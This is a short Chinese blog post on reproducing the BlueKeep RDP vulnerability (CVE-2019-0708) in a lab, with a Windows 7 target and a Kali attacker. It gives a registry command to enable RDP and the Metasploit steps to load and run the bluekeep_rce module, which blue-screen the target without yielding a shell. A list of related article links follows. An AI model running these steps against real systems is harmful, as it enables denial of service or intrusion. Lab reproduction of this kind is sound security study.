cve-2019-0708复现
程序员文章站
2022-07-15 15:06:59
...
准备工作
靶机:win 7 ip:192.168.128.128 开放3389端口
攻击机:kali2 ip:192.168.128.129
实际操作
对靶机进行开放3389
在cmd内输入
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
使用netstat 查看端口开放情况
在kali里开启msf
输入msfconsole
如果没有找到建议更新一下软件apt-get install metasploit-framework
查找exp 输入 search 0708
使用 exp 输入use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
使用 show options
查看主要参数
使用show targets
查看攻击目标
设置参数
set rhost 192.168.128.128
set target 3
运行结果
靶机直接蓝屏
最后
不知怎的就是不能获取道shell,查阅资料设置set forceexploit true
还是不能得到shell
推荐阅读
-
Tensorflow复现DenseNet cifar-10(正确率91%)
-
Windows CVE-2019-0708 远程桌面代码执行漏洞复现
-
2020KDD-CUP阿里天池一篇baseline复现debiasingRush(一)
-
币币世界打破数字货币壁垒,复现全民增值时代
-
网络安全渗透测试反序列化漏洞分析与复现工作
-
Tensorflow复现DenseNet cifar-10(正确率91%)
-
网络安全渗透测试反序列化漏洞分析与复现工作
-
SpringBoot SpEL表达式注入漏洞-分析与复现
-
「漏洞预警」Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现
-
线上Bug无法复现怎么办?老司机教你一招,SpringBoot远程调试不用愁!